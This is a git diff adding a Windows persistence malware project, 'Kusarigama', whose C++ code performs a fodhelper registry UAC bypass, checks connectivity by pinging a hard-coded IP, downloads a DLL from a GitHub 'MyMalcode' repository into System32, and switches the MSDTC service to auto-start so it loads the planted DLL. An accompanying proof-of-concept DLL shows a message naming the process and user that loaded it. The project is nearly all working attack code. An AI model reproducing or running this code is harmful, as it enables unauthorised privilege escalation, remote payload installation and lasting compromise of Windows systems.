diff --git a/The Persistence Series/Kusarigama/Kusarigama.pdf b/The Persistence Series/Kusarigama/Kusarigama.pdf new file mode 100644 index 0000000..fd74db7 Binary files /dev/null and b/The Persistence Series/Kusarigama/Kusarigama.pdf differ diff --git a/The Persistence Series/Kusarigama/Main.cpp b/The Persistence Series/Kusarigama/Main.cpp new file mode 100644 index 0000000..6d1931e --- /dev/null +++ b/The Persistence Series/Kusarigama/Main.cpp @@ -0,0 +1,502 @@ +#include "Peb.h" + +BOOL IsOnline(VOID); +DWORD PmDownloadPhantomDll(VOID); +BOOL AmIAdmin(VOID); +DWORD UACBypass(VOID); +BOOL RegDeleteEntry(HKEY hKey); +BOOL InitMsdtcService(VOID); + + +INT WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, PSTR lpCmdLine, INT nCmdShow) +{ + DWORD dwError = ERROR_SUCCESS; + PPEB Peb = (PPEB)__readgsqword(0x60); + + if (Peb->OSMajorVersion < 6) + goto EXIT_ROUTINE; + + if (!AmIAdmin()) + { + if (UACBypass() != ERROR_SUCCESS) + goto EXIT_ROUTINE; + else + return ERROR_SUCCESS; + } + + if (!IsOnline()) + goto EXIT_ROUTINE; + + if (PmDownloadPhantomDll() != ERROR_SUCCESS) + goto EXIT_ROUTINE; + + if (!InitMsdtcService()) + goto EXIT_ROUTINE; + + return ERROR_SUCCESS; + +EXIT_ROUTINE: + + dwError = GetLastError(); + + return dwError; +} + +BOOL InitMsdtcService(VOID) +{ + DWORD dwError = ERROR_SUCCESS; + SC_HANDLE hService = NULL; + SC_HANDLE hMdtsc = NULL; + SERVICE_STATUS_PROCESS ssStatus = { 0 }; + + DWORD dwOldCheckPoint = ERROR_SUCCESS; + DWORD dwStartTickCount = ERROR_SUCCESS; + DWORD dwWaitTime = ERROR_SUCCESS; + LPQUERY_SERVICE_CONFIGW lpQuery = NULL; + + DWORD dwDispose = ERROR_SUCCESS; + + hService = OpenSCManagerW(NULL, SERVICES_ACTIVE_DATABASEW, SC_MANAGER_ALL_ACCESS); + if (hService == NULL) + goto EXIT_ROUTINE; + + hMdtsc = OpenServiceW(hService, L"MSDTC", SC_MANAGER_ALL_ACCESS); + if (hMdtsc == NULL) + goto EXIT_ROUTINE; + + if (!QueryServiceStatusEx(hMdtsc, SC_STATUS_PROCESS_INFO, (LPBYTE)&ssStatus, sizeof(SERVICE_STATUS_PROCESS), &dwError)) + goto EXIT_ROUTINE; + + if (ssStatus.dwCurrentState != SERVICE_STOPPED && ssStatus.dwCurrentState != SERVICE_STOP_PENDING) + goto EXIT_ROUTINE; + + if (ssStatus.dwCurrentState == SERVICE_STOP_PENDING) + { + dwStartTickCount = GetTickCount(); + dwOldCheckPoint = ssStatus.dwCheckPoint; + } + + while (ssStatus.dwCurrentState == SERVICE_STOP_PENDING) + { + dwWaitTime = ssStatus.dwWaitHint / 10; + + if (dwWaitTime < 1000) + dwWaitTime = 1000; + else + dwWaitTime = 10000; + + Sleep(dwWaitTime); + + if (!QueryServiceStatusEx(hMdtsc, SC_STATUS_PROCESS_INFO, (LPBYTE)&ssStatus, sizeof(SERVICE_STATUS_PROCESS), &dwError)) + goto EXIT_ROUTINE; + + if (ssStatus.dwCheckPoint > dwOldCheckPoint) + { + dwStartTickCount = GetTickCount(); + dwOldCheckPoint = ssStatus.dwCheckPoint; + } + else + { + if (GetTickCount() - dwStartTickCount > ssStatus.dwWaitHint) + { + goto EXIT_ROUTINE; + } + } + } + + dwError = ERROR_SUCCESS; + QueryServiceConfigW(hMdtsc, NULL, 0, &dwError); + + lpQuery = (LPQUERY_SERVICE_CONFIGW)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, dwError); + if (lpQuery == NULL) + goto EXIT_ROUTINE; + + dwDispose = dwError; + + if (!QueryServiceConfigW(hMdtsc, lpQuery, dwDispose, &dwError)) + goto EXIT_ROUTINE; + + if (lpQuery->dwStartType != SERVICE_AUTO_START) + { + if (!ChangeServiceConfigW(hMdtsc, + SERVICE_NO_CHANGE, + SERVICE_AUTO_START, + SERVICE_NO_CHANGE, + NULL, + NULL, + NULL, + NULL, + NULL, + NULL, + NULL)) + { + goto EXIT_ROUTINE; + } + + if (!StartServiceW(hMdtsc, 0, NULL)) + goto EXIT_ROUTINE; + + dwError = ERROR_SUCCESS; + if (!QueryServiceStatusEx(hMdtsc, SC_STATUS_PROCESS_INFO, (LPBYTE)&ssStatus, sizeof(SERVICE_STATUS_PROCESS), &dwError)) + goto EXIT_ROUTINE; + + dwStartTickCount = GetTickCount(); + dwOldCheckPoint = ssStatus.dwCheckPoint; + + while (ssStatus.dwCurrentState == SERVICE_START_PENDING) + { + dwWaitTime = ssStatus.dwWaitHint / 10; + if (dwWaitTime < 1000) + dwWaitTime = 1000; + else + { + if (dwWaitTime > 10000) + dwWaitTime = 10000; + } + + Sleep(dwWaitTime); + + if (!QueryServiceStatusEx(hMdtsc, SC_STATUS_PROCESS_INFO, (LPBYTE)&ssStatus, sizeof(SERVICE_STATUS_PROCESS), &dwError)) + goto EXIT_ROUTINE; + + if (ssStatus.dwCheckPoint > dwOldCheckPoint) + { + dwStartTickCount = GetTickCount(); + dwOldCheckPoint = ssStatus.dwCheckPoint; + } + else + { + if (GetTickCount() - dwStartTickCount > ssStatus.dwWaitHint) + { + break; + } + } + } + + } + + if (lpQuery) + HeapFree(GetProcessHeap(), HEAP_ZERO_MEMORY, lpQuery); + + if (hMdtsc) + CloseServiceHandle(hMdtsc); + + if (hService) + CloseServiceHandle(hService); + + + return TRUE; + +EXIT_ROUTINE: + + dwError = GetLastError(); + + if (lpQuery) + HeapFree(GetProcessHeap(), HEAP_ZERO_MEMORY, lpQuery); + + if (hMdtsc) + CloseServiceHandle(hMdtsc); + + if (hService) + CloseServiceHandle(hService); + + SetLastError(dwError); + + return FALSE; +} + +BOOL RegDeleteEntry(HKEY hKey) +{ + if (RegDeleteKeyExW(hKey, L"SOFTWARE\\Classes\\ms-settings\\shell\\open\\command\\", KEY_WOW64_64KEY, 0) != ERROR_SUCCESS) + goto EXIT_ROUTINE; + + if (RegDeleteKeyExW(hKey, L"SOFTWARE\\Classes\\ms-settings\\shell\\open\\", KEY_WOW64_64KEY, 0) != ERROR_SUCCESS) + goto EXIT_ROUTINE; + + if (RegDeleteKeyExW(hKey, L"SOFTWARE\\Classes\\ms-settings\\shell\\", KEY_WOW64_64KEY, 0) != ERROR_SUCCESS) + goto EXIT_ROUTINE; + + if (RegDeleteKeyExW(hKey, L"SOFTWARE\\Classes\\ms-settings\\", KEY_WOW64_64KEY, 0) != ERROR_SUCCESS) + goto EXIT_ROUTINE; + + return TRUE; + +EXIT_ROUTINE: + + return FALSE; +} + +DWORD UACBypass(VOID) +{ + HKEY hKey = HKEY_CURRENT_USER; + HKEY hkResult; + WCHAR pvData[WCHAR_MAXPATH] = { 0 }; + WCHAR lpData[WCHAR_MAXPATH] = { 0 }; + WCHAR lpApplicationName[WCHAR_MAXPATH] = L"C:\\Windows\\System32\\cmd.exe /k C:\\Windows\\System32\\Fodhelper.exe"; + WCHAR lpDelegateString[WCHAR_MAXPATH] = L"DelegateExecute"; + DWORD pchData = 0; + DWORD dwGetValue = 0; + DWORD dwSetValue = 0; + PROCESS_INFORMATION Pi = { 0 }; + STARTUPINFOW Si = { 0 }; + Si.cb = sizeof(STARTUPINFOW); + + if (RegCreateKeyEx(hKey, L"SOFTWARE\\Classes\\ms-settings\\shell\\open\\command\\", 0, NULL, + REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &hkResult, NULL) != ERROR_SUCCESS) + { + goto EXIT_ROUTINE; + } + + if (GetModuleFileNameW(NULL, lpData, WCHAR_MAXPATH) == 0) + goto EXIT_ROUTINE; + + if (RegSetKeyValueW(hkResult, NULL, NULL, REG_SZ, lpData, (DWORD)wcslen(lpData) * (DWORD)sizeof(WCHAR)) != ERROR_SUCCESS) + goto EXIT_ROUTINE; + + dwGetValue = RegGetValueW(hkResult, NULL, lpDelegateString, RRF_RT_REG_SZ, NULL, pvData, &pchData); + + if (dwGetValue == 2) + { + if (RegSetKeyValueW(hkResult, NULL, lpDelegateString, REG_SZ, NULL, 0) != ERROR_SUCCESS) + goto EXIT_ROUTINE; + } + + if (!CreateProcessW(L"C:\\Windows\\System32\\cmd.exe", + lpApplicationName, + NULL, + NULL, + FALSE, + CREATE_NEW_CONSOLE | NORMAL_PRIORITY_CLASS, + NULL, + NULL, + &Si, + &Pi)) + { + goto EXIT_ROUTINE; + } + + + Sleep(5000); + + if (!RegDeleteEntry(hKey)) + goto EXIT_ROUTINE; + + if (hkResult) + RegCloseKey(hkResult); + + if (hKey) + RegCloseKey(hKey); + + if (Pi.hProcess) + CloseHandle(Pi.hProcess); + + if (Pi.hThread) + CloseHandle(Pi.hThread); + + return ERROR_SUCCESS; + +EXIT_ROUTINE: + + DWORD dwError = GetLastError(); + + if (hkResult) + RegCloseKey(hkResult); + + if (hKey) + RegCloseKey(hKey); + + if (Pi.hProcess) + CloseHandle(Pi.hProcess); + + if (Pi.hThread) + CloseHandle(Pi.hThread); + + return dwError; +} + +BOOL AmIAdmin(VOID) +{ + BOOL AmIAdmin = FALSE; + HANDLE HToken = NULL; + TOKEN_ELEVATION Elevation = { 0 }; + DWORD dwSize; + + if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &HToken)) + goto EXIT_ROUTINE; + + if (!GetTokenInformation(HToken, TokenElevation, &Elevation, sizeof(Elevation), &dwSize)) + goto EXIT_ROUTINE; + + AmIAdmin = Elevation.TokenIsElevated; + +EXIT_ROUTINE: + + if (HToken) + { + CloseHandle(HToken); + HToken = NULL; + } + return AmIAdmin; +} + +DWORD PmDownloadPhantomDll(VOID) +{ + DWORD dwError = ERROR_SUCCESS; + HINTERNET hInternetOpen = NULL; + HINTERNET hInternetConnect = NULL; + WCHAR wLegacyAgent[MAX_PATH] = L"Mozilla/4.0 (compatible; MSIE 8.0; Win32)"; + BYTE tBuffer[4096] = { 0 }; + WCHAR FileCreationPath[MAX_PATH] = { 0 }; + HANDLE hHandle = INVALID_HANDLE_VALUE; + + DWORD dwBytesRead = 1; + + hInternetOpen = InternetOpenW(wLegacyAgent, INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0); + if (hInternetOpen == NULL) + goto EXIT_ROUTINE; + + hInternetConnect = InternetOpenUrlW(hInternetOpen, L"https://github.com/smellyvx/MyMalcode/raw/main/oci.dll", + NULL, 0, INTERNET_FLAG_NO_CACHE_WRITE | INTERNET_FLAG_KEEP_CONNECTION, 0); + if (hInternetConnect == NULL) + goto EXIT_ROUTINE; + + if (GetEnvironmentVariableW(L"SYSTEMROOT", FileCreationPath, MAX_PATH) == 0) + goto EXIT_ROUTINE; + else + wcscat(FileCreationPath, L"\\system32\\oci.dll"); + + hHandle = CreateFile(FileCreationPath, GENERIC_READ | GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL); + if (hHandle == INVALID_HANDLE_VALUE) + goto EXIT_ROUTINE; + + for (; dwBytesRead > 0;) + { + DWORD dwTemp = 0; + ZeroMemory(tBuffer, 4096); + + if (!InternetReadFile(hInternetConnect, tBuffer, 4096, &dwBytesRead)) + goto EXIT_ROUTINE; + + if (!WriteFile(hHandle, tBuffer, dwBytesRead, &dwTemp, NULL)) + goto EXIT_ROUTINE; + } + + if (hHandle) + CloseHandle(hHandle); + + if (hInternetConnect) + InternetCloseHandle(hInternetConnect); + + if (hInternetOpen) + InternetCloseHandle(hInternetOpen); + + return ERROR_SUCCESS; + + +EXIT_ROUTINE: + + dwError = GetLastError(); + + if (hHandle) + CloseHandle(hHandle); + + if (hInternetConnect) + InternetCloseHandle(hInternetConnect); + + if (hInternetOpen) + InternetCloseHandle(hInternetOpen); + + return dwError; +} + +BOOL IsOnline(VOID) +{ + DWORD dwError = ERROR_SUCCESS; + HMODULE hLibrary = NULL; + ICMPSENDECHO IcmpSendEcho = NULL; + ICMPCREATEFILE IcmpCreateFile = NULL; + ICMPCLOSEHANDLE IcmpCloseHandle = NULL; + RTLIPV4ADDRESSTOSTRINGW RtlIpv4AddressToStringW = NULL; + ULONG uIpAddress = INADDR_NONE; + HANDLE hHandle = INVALID_HANDLE_VALUE; + HMODULE hNtdllMod = NULL; + + CHAR SendData[16] = "ICMP_REQ"; + DWORD dwReplySize = ERROR_SUCCESS; + LPVOID lpReplyBuffer = NULL; + + WCHAR wAddress[32] = { 0 }; + + hLibrary = LoadLibraryW(L"Iphlpapi.dll"); + if (hLibrary == NULL) + goto EXIT_ROUTINE; + + hNtdllMod = GetModuleHandle(L"ntdll.dll"); + if (hNtdllMod == NULL) + goto EXIT_ROUTINE; + + IcmpSendEcho = (ICMPSENDECHO)GetProcAddress(hLibrary, "IcmpSendEcho"); + IcmpCreateFile = (ICMPCREATEFILE)GetProcAddress(hLibrary, "IcmpCreateFile"); + IcmpCloseHandle = (ICMPCLOSEHANDLE)GetProcAddress(hLibrary, "IcmpCloseHandle"); + RtlIpv4AddressToStringW = (RTLIPV4ADDRESSTOSTRINGW)GetProcAddress(hNtdllMod, "RtlIpv4AddressToStringW"); + + if (!IcmpCreateFile || !IcmpSendEcho || !IcmpCloseHandle || !RtlIpv4AddressToStringW) + goto EXIT_ROUTINE; + + uIpAddress = inet_addr("173.208.211.68"); + if (uIpAddress == INADDR_NONE) + goto EXIT_ROUTINE; + + hHandle = IcmpCreateFile(); + if (hHandle == INVALID_HANDLE_VALUE) + goto EXIT_ROUTINE; + + dwReplySize = sizeof(ICMP_ECHO_REPLY) + sizeof(SendData); + lpReplyBuffer = (LPVOID)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, (SIZE_T)dwReplySize); + if (lpReplyBuffer == NULL) + goto EXIT_ROUTINE; + + dwError = IcmpSendEcho(hHandle, uIpAddress, SendData, sizeof(SendData), NULL, lpReplyBuffer, dwReplySize, 1000); + if (dwError != 0) + { + PICMP_ECHO_REPLY pEchoReply = (PICMP_ECHO_REPLY)lpReplyBuffer; + struct in_addr ReplyAddr = { 0 }; + + ReplyAddr.S_un.S_addr = pEchoReply->Address; + + RtlIpv4AddressToStringW(&ReplyAddr, wAddress); + } + else + goto EXIT_ROUTINE; + + if (wcscmp(L"173.208.211.68", wAddress) != 0) + goto EXIT_ROUTINE; + + if (lpReplyBuffer) + HeapFree(GetProcessHeap(), HEAP_ZERO_MEMORY, lpReplyBuffer); + + if (hHandle) + IcmpCloseHandle(hHandle); + + if (hLibrary) + FreeLibrary(hLibrary); + + return TRUE; + +EXIT_ROUTINE: + + dwError = GetLastError(); + + if (lpReplyBuffer) + HeapFree(GetProcessHeap(), HEAP_ZERO_MEMORY, lpReplyBuffer); + + if (hHandle) + IcmpCloseHandle(hHandle); + + if (hLibrary) + FreeLibrary(hLibrary); + + SetLastError(dwError); + + return FALSE; +} diff --git a/The Persistence Series/Kusarigama/Malicious oci.dll code/Dllmain.cpp b/The Persistence Series/Kusarigama/Malicious oci.dll code/Dllmain.cpp new file mode 100644 index 0000000..e0a3df2 --- /dev/null +++ b/The Persistence Series/Kusarigama/Malicious oci.dll code/Dllmain.cpp @@ -0,0 +1,70 @@ +// this code donated to us by Jonas Lyk (https://twitter.com/jonasLyk) +#include +#include + +#include +#include +#include +#include + +#include + + +#pragma comment(lib, "Wtsapi32.lib") + +using namespace std; + +#include + +auto getUsername() { + wchar_t usernamebuf[UNLEN + 1]; + DWORD size = UNLEN + 1; + GetUserName((TCHAR*)usernamebuf, &size); + static auto username = wstring{ usernamebuf }; + return username; +} + +auto getProcessFilename() { + wchar_t process_filenamebuf[MAX_PATH]{ 0x0000 }; + GetModuleFileName(0, process_filenamebuf, MAX_PATH); + static auto process_filename = wstring{ process_filenamebuf }; + return process_filename; +} + +auto getModuleFilename(HMODULE hModule = nullptr) { + wchar_t module_filenamebuf[MAX_PATH]{ 0x0000 }; + if (hModule != nullptr) GetModuleFileName(hModule, module_filenamebuf, MAX_PATH); + static auto module_filename = wstring{ module_filenamebuf }; + return module_filename; +} + +bool showMessage() { + Beep(4000, 400); + Beep(4000, 400); + Beep(4000, 400); + + auto m = L"This file:\n"s + getModuleFilename() + L"\nwas loaded by:\n"s + getProcessFilename() + L"\nrunning as:\n" + getUsername(); + auto message = (wchar_t*)m.c_str(); + DWORD messageAnswer{}; + WTSSendMessage(WTS_CURRENT_SERVER_HANDLE, WTSGetActiveConsoleSessionId(), (wchar_t*)L"", 0, message, lstrlenW(message) * 2, 0, 0, &messageAnswer, true); + + return true; +} +//static const auto init = spawnShell(); + +BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) +{ + getModuleFilename(hModule); + static auto const msgshown = showMessage(); + + switch (ul_reason_for_call) + { + case DLL_PROCESS_ATTACH: + case DLL_THREAD_ATTACH: + case DLL_THREAD_DETACH: + case DLL_PROCESS_DETACH: + break; + } + return TRUE; +} + diff --git a/The Persistence Series/Kusarigama/Peb.h b/The Persistence Series/Kusarigama/Peb.h new file mode 100644 index 0000000..62bcb78 --- /dev/null +++ b/The Persistence Series/Kusarigama/Peb.h @@ -0,0 +1,106 @@ +#pragma once + +#include +#include +#include +#include +#include + +#pragma comment(lib, "Ws2_32.lib") +#pragma comment(lib, "wininet.lib") + +#define WCHAR_MAXPATH (MAX_PATH * sizeof(WCHAR)) + +typedef struct _LSA_UNICODE_STRING { + USHORT Length; + USHORT MaximumLength; + PWSTR Buffer; +} LSA_UNICODE_STRING, * PLSA_UNICODE_STRING, UNICODE_STRING, * PUNICODE_STRING; + +typedef struct _LDR_MODULE { + LIST_ENTRY InLoadOrderModuleList; + LIST_ENTRY InMemoryOrderModuleList; + LIST_ENTRY InInitializationOrderModuleList; + PVOID BaseAddress; + PVOID EntryPoint; + ULONG SizeOfImage; + UNICODE_STRING FullDllName; + UNICODE_STRING BaseDllName; + ULONG Flags; + SHORT LoadCount; + SHORT TlsIndex; + LIST_ENTRY HashTableEntry; + ULONG TimeDateStamp; +} LDR_MODULE, * PLDR_MODULE; + +typedef struct _PEB_LDR_DATA { + ULONG Length; + ULONG Initialized; + PVOID SsHandle; + LIST_ENTRY InLoadOrderModuleList; + LIST_ENTRY InMemoryOrderModuleList; + LIST_ENTRY InInitializationOrderModuleList; +} PEB_LDR_DATA, * PPEB_LDR_DATA; + +typedef struct _PEB { + BOOLEAN InheritedAddressSpace; + BOOLEAN ReadImageFileExecOptions; + BOOLEAN BeingDebugged; + BOOLEAN Spare; + HANDLE Mutant; + PVOID ImageBase; + PPEB_LDR_DATA LoaderData; + PVOID ProcessParameters; + PVOID SubSystemData; + PVOID ProcessHeap; + PVOID FastPebLock; + PVOID FastPebLockRoutine; + PVOID FastPebUnlockRoutine; + ULONG EnvironmentUpdateCount; + PVOID* KernelCallbackTable; + PVOID EventLogSection; + PVOID EventLog; + PVOID FreeList; + ULONG TlsExpansionCounter; + PVOID TlsBitmap; + ULONG TlsBitmapBits[0x2]; + PVOID ReadOnlySharedMemoryBase; + PVOID ReadOnlySharedMemoryHeap; + PVOID* ReadOnlyStaticServerData; + PVOID AnsiCodePageData; + PVOID OemCodePageData; + PVOID UnicodeCaseTableData; + ULONG NumberOfProcessors; + ULONG NtGlobalFlag; + BYTE Spare2[0x4]; + LARGE_INTEGER CriticalSectionTimeout; + ULONG HeapSegmentReserve; + ULONG HeapSegmentCommit; + ULONG HeapDeCommitTotalFreeThreshold; + ULONG HeapDeCommitFreeBlockThreshold; + ULONG NumberOfHeaps; + ULONG MaximumNumberOfHeaps; + PVOID** ProcessHeaps; + PVOID GdiSharedHandleTable; + PVOID ProcessStarterHelper; + PVOID GdiDCAttributeList; + PVOID LoaderLock; + ULONG OSMajorVersion; + ULONG OSMinorVersion; + ULONG OSBuildNumber; + ULONG OSPlatformId; + ULONG ImageSubSystem; + ULONG ImageSubSystemMajorVersion; + ULONG ImageSubSystemMinorVersion; + ULONG GdiHandleBuffer[0x22]; + ULONG PostProcessInitRoutine; + ULONG TlsExpansionBitmap; + BYTE TlsExpansionBitmapBits[0x80]; + ULONG SessionId; +} PEB, * PPEB; + + +typedef DWORD(WINAPI* ICMPSENDECHO)(HANDLE, IPAddr, LPVOID, WORD, PIP_OPTION_INFORMATION, LPVOID, DWORD, DWORD); +typedef HANDLE(WINAPI* ICMPCREATEFILE)(VOID); +typedef BOOL(WINAPI* ICMPCLOSEHANDLE)(HANDLE); +typedef PSTR(WINAPI* RTLIPV4ADDRESSTOSTRINGW)(IN_ADDR*, PWSTR); \ No newline at end of file